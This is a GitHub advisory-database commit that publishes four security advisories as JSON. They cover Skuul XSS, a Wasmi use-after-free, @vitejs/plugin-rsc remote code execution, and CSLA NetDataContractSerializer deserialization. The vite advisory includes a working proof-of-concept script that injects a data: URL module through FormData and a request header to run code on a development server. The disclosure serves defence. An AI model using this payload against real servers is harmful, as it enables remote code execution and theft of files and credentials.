Skip to content

Commit a0bff0a

Browse files
advisory-database[bot]advisory-database[bot]
committed
Publish Advisories
GHSA-92x3-mfjp-j3h3 GHSA-g4v2-cjqp-rfmq GHSA-j76j-5p5g-9wfr GHSA-wq34-7f4g-953v
1 parent 6814e20 commit a0bff0a

File tree

4 files changed

+274
-6
lines changed

4 files changed

+274
-6
lines changed

advisories/unreviewed/2025/11/GHSA-92x3-mfjp-j3h3/GHSA-92x3-mfjp-j3h3.json renamed to advisories/github-reviewed/2025/11/GHSA-92x3-mfjp-j3h3/GHSA-92x3-mfjp-j3h3.json

Lines changed: 31 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -1,11 +1,12 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-92x3-mfjp-j3h3",
4-
"modified": "2025-11-30T09:30:18Z",
4+
"modified": "2025-12-08T22:16:09Z",
55
"published": "2025-11-30T09:30:18Z",
66
"aliases": [
77
"CVE-2025-13784"
88
],
9+
"summary": "yungifez Skuul School Management System vulnerable to XSS via SVG",
910
"details": "A weakness has been identified in yungifez Skuul School Management System up to 2.6.5. This vulnerability affects unknown code of the file /dashboard/schools/1/edit of the component SVG File Handler. This manipulation causes cross site scripting. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way.",
1011
"severity": [
1112
{
@@ -14,10 +15,30 @@
1415
},
1516
{
1617
"type": "CVSS_V4",
17-
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
18+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"
19+
}
20+
],
21+
"affected": [
22+
{
23+
"package": {
24+
"ecosystem": "Packagist",
25+
"name": "yungifez/skuul"
26+
},
27+
"ranges": [
28+
{
29+
"type": "ECOSYSTEM",
30+
"events": [
31+
{
32+
"introduced": "0"
33+
},
34+
{
35+
"last_affected": "2.6.5"
36+
}
37+
]
38+
}
39+
]
1840
}
1941
],
20-
"affected": [],
2142
"references": [
2243
{
2344
"type": "ADVISORY",
@@ -27,6 +48,10 @@
2748
"type": "WEB",
2849
"url": "https://gist.github.com/thezeekhan/7fc54fd44bc5f318be0350b367b2d8ff"
2950
},
51+
{
52+
"type": "PACKAGE",
53+
"url": "https://github.com/yungifez/skuul"
54+
},
3055
{
3156
"type": "WEB",
3257
"url": "https://vuldb.com/?ctiid.333788"
@@ -44,9 +69,9 @@
4469
"cwe_ids": [
4570
"CWE-79"
4671
],
47-
"severity": "MODERATE",
48-
"github_reviewed": false,
49-
"github_reviewed_at": null,
72+
"severity": "LOW",
73+
"github_reviewed": true,
74+
"github_reviewed_at": "2025-12-08T22:16:09Z",
5075
"nvd_published_at": "2025-11-30T07:15:44Z"
5176
}
5277
}

advisories/github-reviewed/2025/12/GHSA-g4v2-cjqp-rfmq/GHSA-g4v2-cjqp-rfmq.json

Lines changed: 118 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,118 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-g4v2-cjqp-rfmq",
4+
"modified": "2025-12-08T22:15:49Z",
5+
"published": "2025-12-08T22:15:49Z",
6+
"aliases": [
7+
"CVE-2025-66627"
8+
],
9+
"summary": "Critical Use-After-Free in Wasmi's Linear Memory",
10+
"details": "### Summary\n\nA use-after-free vulnerability has been discovered in the linear memory implementation of Wasmi. This issue can be triggered by a WebAssembly module under certain memory growth conditions, potentially leading to memory corruption, information disclosure, or code execution.\n\n### Impact\n\n- **Confidentiality:** High – attacker-controlled memory reads possible.\n- **Integrity:** High – memory corruption may allow arbitrary writes.\n- **Availability:** High – interpreter crashes possible.\n\n### Affected Versions\n\nWasmi `v0.41.0` through Wasmi `v1.0.0`.\n\n### Workarounds\n\n- Upgrade to the latest patched version of Wasmi.\n- Consider limiting the maximum linear memory sizes where feasible.\n\n### Credits\n\nThis vulnerability was discovered by **Robert T. Morris (RTM)**.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "crates.io",
21+
"name": "wasmi"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0.41.0"
29+
},
30+
{
31+
"fixed": "0.41.2"
32+
}
33+
]
34+
}
35+
]
36+
},
37+
{
38+
"package": {
39+
"ecosystem": "crates.io",
40+
"name": "wasmi"
41+
},
42+
"ranges": [
43+
{
44+
"type": "ECOSYSTEM",
45+
"events": [
46+
{
47+
"introduced": "0.42.0"
48+
},
49+
{
50+
"fixed": "0.47.1"
51+
}
52+
]
53+
}
54+
]
55+
},
56+
{
57+
"package": {
58+
"ecosystem": "crates.io",
59+
"name": "wasmi"
60+
},
61+
"ranges": [
62+
{
63+
"type": "ECOSYSTEM",
64+
"events": [
65+
{
66+
"introduced": "0.50.0"
67+
},
68+
{
69+
"fixed": "0.51.3"
70+
}
71+
]
72+
}
73+
]
74+
},
75+
{
76+
"package": {
77+
"ecosystem": "crates.io",
78+
"name": "wasmi"
79+
},
80+
"ranges": [
81+
{
82+
"type": "ECOSYSTEM",
83+
"events": [
84+
{
85+
"introduced": "1.0.0"
86+
},
87+
{
88+
"fixed": "1.0.1"
89+
}
90+
]
91+
}
92+
]
93+
}
94+
],
95+
"references": [
96+
{
97+
"type": "WEB",
98+
"url": "https://github.com/wasmi-labs/wasmi/security/advisories/GHSA-g4v2-cjqp-rfmq"
99+
},
100+
{
101+
"type": "WEB",
102+
"url": "https://github.com/wasmi-labs/wasmi/commit/0e6f0d2a8325602c58d6a53ce1c0e6045eb6a490"
103+
},
104+
{
105+
"type": "PACKAGE",
106+
"url": "https://github.com/wasmi-labs/wasmi"
107+
}
108+
],
109+
"database_specific": {
110+
"cwe_ids": [
111+
"CWE-416"
112+
],
113+
"severity": "HIGH",
114+
"github_reviewed": true,
115+
"github_reviewed_at": "2025-12-08T22:15:49Z",
116+
"nvd_published_at": null
117+
}
118+
}

advisories/github-reviewed/2025/12/GHSA-j76j-5p5g-9wfr/GHSA-j76j-5p5g-9wfr.json

Lines changed: 64 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,64 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-j76j-5p5g-9wfr",
4+
"modified": "2025-12-08T22:16:32Z",
5+
"published": "2025-12-08T22:16:31Z",
6+
"aliases": [
7+
"CVE-2025-67489"
8+
],
9+
"summary": "@vitejs/plugin-rsc Remote Code Execution through unsafe dynamic imports in RSC server function APIs on development server",
10+
"details": "## Summary\n\nArbitrary Remote Code Execution on development server via unsafe dynamic imports in `@vitejs/plugin-rsc` server function APIs (`loadServerAction`, `decodeReply`, `decodeAction`) when integrated into RSC applications that expose server function endpoints.\n\n## Impact\n\nAttackers with network access to the development server can execute arbitrary JavaScript code with Node.js privileges, allowing them to read/modify files, exfiltrate sensitive data (source code, environment variables, credentials), or pivot to other internal services. While this affects development servers only, the risk increases when using `vite --host` to expose the server on all network interfaces.\n\n\n## Details\n\nIn the example RSC application provided in Proof of Concept, the server handles server function call through API such as `loadServerAction`, `decodeReply`, `decodeAction` with http request's header and body as inputs:\n\nhttps://github.com/vitejs/vite-plugin-react/blob/c8af971f57f12d0190d7fd8829a429f5e4112f60/packages/plugin-rsc/examples/starter/src/framework/entry.rsc.tsx#L42-L47\n\nDuring development, these API internally relies on dynamic import to load server function module, which allows executing arbitrary module including data url module.\n\nhttps://github.com/vitejs/vite-plugin-react/blob/c8af971f57f12d0190d7fd8829a429f5e4112f60/packages/plugin-rsc/src/rsc.tsx#L19-L24\n\n## Proof of Concept\n\nThe example app is avialable in\n- https://github.com/vitejs/vite-plugin-react/tree/main/packages/plugin-rsc/examples/starter\n- https://stackblitz.com/edit/github-rubfqp9k?file=poc.js\n\n**Reproduction Steps:**\n\n- Stat development server `vite dev`\n- Run a following script `node poc.js`\n- See \"REMOTE CODE EXECUTION1\" and \"REMOTE CODE EXECUTION2\" in server console\n\n```js\n// [poc.js]\nconst payload = {\n 0: [\"$F1\"],\n 1: { id: \"data:text/javascript,console.log('REMOTE CODE EXECUTION 1')# \" },\n};\nconst fd = new FormData();\nfor (const key in payload) {\n fd.append(key, JSON.stringify(payload[key]));\n}\n\nconst serverUrl = process.argv[2] || 'http://localhost:5173/_.rsc';\nconst response = fetch(serverUrl, {\n method: \"POST\",\n headers: {\n \"x-rsc-action\": \"data:text/javascript,console.log('REMOTE CODE EXECUTION 2')# \",\n },\n body: fd,\n})\n```",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "npm",
21+
"name": "@vitejs/plugin-rsc"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "0.5.6"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 0.5.5"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-j76j-5p5g-9wfr"
45+
},
46+
{
47+
"type": "WEB",
48+
"url": "https://github.com/vitejs/vite-plugin-react/commit/fe634b58210d0a4a146a7faae56cd71af3bb9af4"
49+
},
50+
{
51+
"type": "PACKAGE",
52+
"url": "https://github.com/vitejs/vite-plugin-react"
53+
}
54+
],
55+
"database_specific": {
56+
"cwe_ids": [
57+
"CWE-94"
58+
],
59+
"severity": "CRITICAL",
60+
"github_reviewed": true,
61+
"github_reviewed_at": "2025-12-08T22:16:31Z",
62+
"nvd_published_at": null
63+
}
64+
}

advisories/github-reviewed/2025/12/GHSA-wq34-7f4g-953v/GHSA-wq34-7f4g-953v.json

Lines changed: 61 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,61 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-wq34-7f4g-953v",
4+
"modified": "2025-12-08T22:15:56Z",
5+
"published": "2025-12-08T22:15:56Z",
6+
"aliases": [
7+
"CVE-2025-66631"
8+
],
9+
"summary": "Csla affected by Remote Code Execution via WcfProxy (NetDataContractSerializer)",
10+
"details": "### Impact\nVersions of CSLA .NET prior to version 6 allow the use of WcfProxy. WcfProxy uses the NetDataContractSerializer (NDCS) which has known vulnerabilities that can allow remote execution of code during deserialization. NDCS itself is considered obsolete, and you should avoid using WcfProxy or upgrade to CSLA 6 or higher where this issue does not exist.\n\n### Patches\nCSLA .NET version 6 and higher do not use WCF or NetDataContractSerializer.\n\n### Workarounds\nIf you are using a version CSLA .NET older than version 6, you should stop using WcfProxy in your data portal configuration. Doing this avoids the use of WCF and the NetDataContractSerializer, avoiding the vulnerability.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V4",
14+
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "NuGet",
21+
"name": "Csla"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "6.0.0"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/MarimerLLC/csla/security/advisories/GHSA-wq34-7f4g-953v"
42+
},
43+
{
44+
"type": "PACKAGE",
45+
"url": "https://github.com/MarimerLLC/csla"
46+
},
47+
{
48+
"type": "WEB",
49+
"url": "https://learn.microsoft.com/en-us/dotnet/fundamentals/code-analysis/quality-rules/ca2310"
50+
}
51+
],
52+
"database_specific": {
53+
"cwe_ids": [
54+
"CWE-502"
55+
],
56+
"severity": "HIGH",
57+
"github_reviewed": true,
58+
"github_reviewed_at": "2025-12-08T22:15:56Z",
59+
"nvd_published_at": null
60+
}
61+
}

0 commit comments

Comments
 (0)